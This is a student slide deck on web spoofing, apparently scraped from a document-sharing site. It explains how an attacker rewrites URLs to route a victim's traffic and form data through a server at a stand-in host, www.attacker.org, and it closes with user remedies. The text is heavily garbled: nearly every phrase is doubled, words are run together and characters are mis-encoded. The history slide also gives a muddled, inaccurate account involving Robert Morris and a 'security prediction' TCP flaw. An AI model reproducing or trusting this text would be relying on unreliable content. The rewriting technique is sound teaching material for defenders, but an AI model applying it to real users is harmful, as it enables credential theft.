16
WEB SPOOFING Prepared by: Prepared by: YUKTI CHUTTANI YUKTI CHUTTANI B.C.A III B.C.A III 15008000610 15008000610
| Date post: | 10-Apr-2018 |
| Category: |
Documents |
| Upload: | yukti-chuttani |
| View: | 221 times |
| Download: | 0 times |
8/8/2019 II Web Spoofing
http://slidepdf.com/reader/full/ii-web-spoofing 1/16
WEB SPOOFINGPrepared by:Prepared by:
YUKTI CHUTTANI YUKTI CHUTTANI B.C.A III B.C.A III
1500800061015008000610
8/8/2019 II Web Spoofing
http://slidepdf.com/reader/full/ii-web-spoofing 2/16
WebWeb Spoofing Spoofing
Allows an attacker to create a ³shadow copy´ of theAllows an attacker to create a ³shadow copy´ of theentire World Wide Web.entire World Wide Web.
Attacker creates misleading context in order toAttacker creates misleading context in order to
trick the victim.trick the victim. Attack is like a con game.Attack is like a con game.
Online fraud.Online fraud.
8/8/2019 II Web Spoofing
http://slidepdf.com/reader/full/ii-web-spoofing 3/16
History History
The concept of web spoofing was discussed inThe concept of web spoofing was discussed in1980 by Robert Morris, whose son found some1980 by Robert Morris, whose son found somesecurity weakness in TCP protocol known assecurity weakness in TCP protocol known as
security prediction.security prediction.
8/8/2019 II Web Spoofing
http://slidepdf.com/reader/full/ii-web-spoofing 4/16
8/8/2019 II Web Spoofing
http://slidepdf.com/reader/full/ii-web-spoofing 5/16
Spoofing attacks Spoofing attacks
in the physical w orld as w ell as the in the physical w orld as w ell as the
electronic w orld electronic w orld In the physical world for example, there haveIn the physical world for example, there have
been several incidents in which criminals set upbeen several incidents in which criminals set upbogus automated teller machines. the criminalbogus automated teller machines. the criminalcopy the victim¶s card and use the duplicate.copy the victim¶s card and use the duplicate.
In the these attack people were fooled for theIn the these attack people were fooled for thecontext what they saw. The location of thecontext what they saw. The location of themachine and the appearance of their electronicmachine and the appearance of their electronicdisplays.displays.
People using computer system often makesPeople using computer system often makes
security relevant decisions based on contextualsecurity relevant decisions based on contextualcues they see. For example you might decide tocues they see. For example you might decide totype in you account number because you believetype in you account number because you believeyou are visiting your bank¶s web page. This belief you are visiting your bank¶s web page. This belief might arise because the page has a familiar look.might arise because the page has a familiar look.
8/8/2019 II Web Spoofing
http://slidepdf.com/reader/full/ii-web-spoofing 6/16
C onsequencesC onsequences
SurveillanceSurveillance ±± the attacker can passivelythe attacker can passivelywatch the traffic, recording which pages thewatch the traffic, recording which pages thevictim visits and the contacts of those pages.victim visits and the contacts of those pages.
((This allows the attacker to observe any This allows the attacker to observe any account numbers or passwords the victimaccount numbers or passwords the victimentersenters.).)
TamperingTampering ±± the attacker can modify any of the attacker can modify any of the data traveling in either direction betweenthe data traveling in either direction between
the victim and the Web. (the victim and the Web. (The attacker would The attacker would change the product number, quantity or shipchange the product number, quantity or shipto addressto address.).)
8/8/2019 II Web Spoofing
http://slidepdf.com/reader/full/ii-web-spoofing 7/16
How the Attack W orksHow the Attack W orks
FormsForms
URL RewritingURL Rewriting
8/8/2019 II Web Spoofing
http://slidepdf.com/reader/full/ii-web-spoofing 8/16
URL R ew riting URL R ew riting
The attacker¶s first trick is to rewrite all of theThe attacker¶s first trick is to rewrite all of theURLs on some web page so that they point to theURLs on some web page so that they point to theattacker¶s server rather than the real server.attacker¶s server rather than the real server.Assuming the attacker¶s server is on the machineAssuming the attacker¶s server is on the machine
www.attacker.orgwww.attacker.org, the attacker rewrites a URL by, the attacker rewrites a URL byaddingadding http://www.attacker.orghttp://www.attacker.org to the front of to the front of the URL. For example,the URL. For example, http://home.netscape.comhttp://home.netscape.combecomesbecomeshttp://www.attacker.org/http://home.netscape.chttp://www.attacker.org/http://home.netscape.comom..
Once the attacker¶s server has fetched the realOnce the attacker¶s server has fetched the realdocument needed to satisfy the request, thedocument needed to satisfy the request, theattacker rewrites all of the URLs. in the documentattacker rewrites all of the URLs. in the documentinto the same special form. Then the attacker¶sinto the same special form. Then the attacker¶sserver provides the rewritten page to the victim¶sserver provides the rewritten page to the victim¶sbrowser.browser.
If the victim fallows a link on the new page, theIf the victim fallows a link on the new page, the¶ ¶
8/8/2019 II Web Spoofing
http://slidepdf.com/reader/full/ii-web-spoofing 9/16
F ormsF orms
When the victim submits a form, the submittedWhen the victim submits a form, the submitteddata goes to the attacker¶s server. The attacker¶sdata goes to the attacker¶s server. The attacker¶sserver can observe and even modify theserver can observe and even modify the
submitted data, doing whatever malicious editingsubmitted data, doing whatever malicious editingdesired, before passing it on to the real server.desired, before passing it on to the real server.
8/8/2019 II Web Spoofing
http://slidepdf.com/reader/full/ii-web-spoofing 10/16
How attacker attacks v ictimHow attacker attacks v ictim
8/8/2019 II Web Spoofing
http://slidepdf.com/reader/full/ii-web-spoofing 11/16
Destroying the I llusionDestroying the I llusion
There are cues that can destroy the illusion:There are cues that can destroy the illusion:
Status lineStatus line
Location lineLocation line
Viewing document sourceViewing document source
These can be virtually eliminatedThese can be virtually eliminated
8/8/2019 II Web Spoofing
http://slidepdf.com/reader/full/ii-web-spoofing 12/16
R emedies to be follow ed R emedies to be follow ed
Follow a three part strategy:Follow a three part strategy: Disable JavaScript in your browser so theDisable JavaScript in your browser so the
attacker will be unable to hide the evidence of attacker will be unable to hide the evidence of the attack;the attack;
Make sure your browser¶s location line is alwaysMake sure your browser¶s location line is alwaysvisible;visible; Pay attention to the URLs displayed on yourPay attention to the URLs displayed on your
browser¶s location line, making sure they alwaysbrowser¶s location line, making sure they alwayspoint to the server you think you are connectedpoint to the server you think you are connectedto.to.
8/8/2019 II Web Spoofing
http://slidepdf.com/reader/full/ii-web-spoofing 13/16
P rotecting yourself against eP rotecting yourself against e--
mail or online fraud mail or online fraud Don¶t take anything for granted.Don¶t take anything for granted. Do not click on links you receive in an eDo not click on links you receive in an e--mailmail
message asking for sensitive personal, financialmessage asking for sensitive personal, financialor account information.or account information.
Call the company directly to confirm requests forCall the company directly to confirm requests forupdating or verifying personal or accountupdating or verifying personal or accountinformation.information.
Do not share your ID¶s or pass codes withDo not share your ID¶s or pass codes withanyone.anyone.
Look for secure connections on Web sites.Look for secure connections on Web sites. Always sign off Web sites or secure areas of WebAlways sign off Web sites or secure areas of WebSites.Sites.
When your computer is not in use, shut it downWhen your computer is not in use, shut it downor disconnect it from the Internet.or disconnect it from the Internet.
8/8/2019 II Web Spoofing
http://slidepdf.com/reader/full/ii-web-spoofing 14/16
C om pleting the illusion:C om pleting the illusion:
The attack as described thus far is fairly effective,The attack as described thus far is fairly effective,but not perfect. There is still some remainingbut not perfect. There is still some remainingcontext that can give the victim clues that thecontext that can give the victim clues that theattack is going on. Such evidence is not too hardattack is going on. Such evidence is not too hardto eliminate because browsers are veryto eliminate because browsers are verycustomizable. The ability of a web page to controlcustomizable. The ability of a web page to controlbrowser behavior is often desirable, but when thebrowser behavior is often desirable, but when thepage is hostile it can be dangerous.page is hostile it can be dangerous.
8/8/2019 II Web Spoofing
http://slidepdf.com/reader/full/ii-web-spoofing 15/16
C onclusion:C onclusion:
Spoofing is a serious threat for internationalSpoofing is a serious threat for internationalcommunity, as the real world applications arecommunity, as the real world applications aregetting more importance overgetting more importance over WWW.WWW.UnderstandingUnderstanding tools and methods, the spooferstools and methods, the spoofershave at their disposal, we can defend attacks to ahave at their disposal, we can defend attacks to aconsiderably amount.considerably amount.
8/8/2019 II Web Spoofing
http://slidepdf.com/reader/full/ii-web-spoofing 16/16
THANKS THANKS
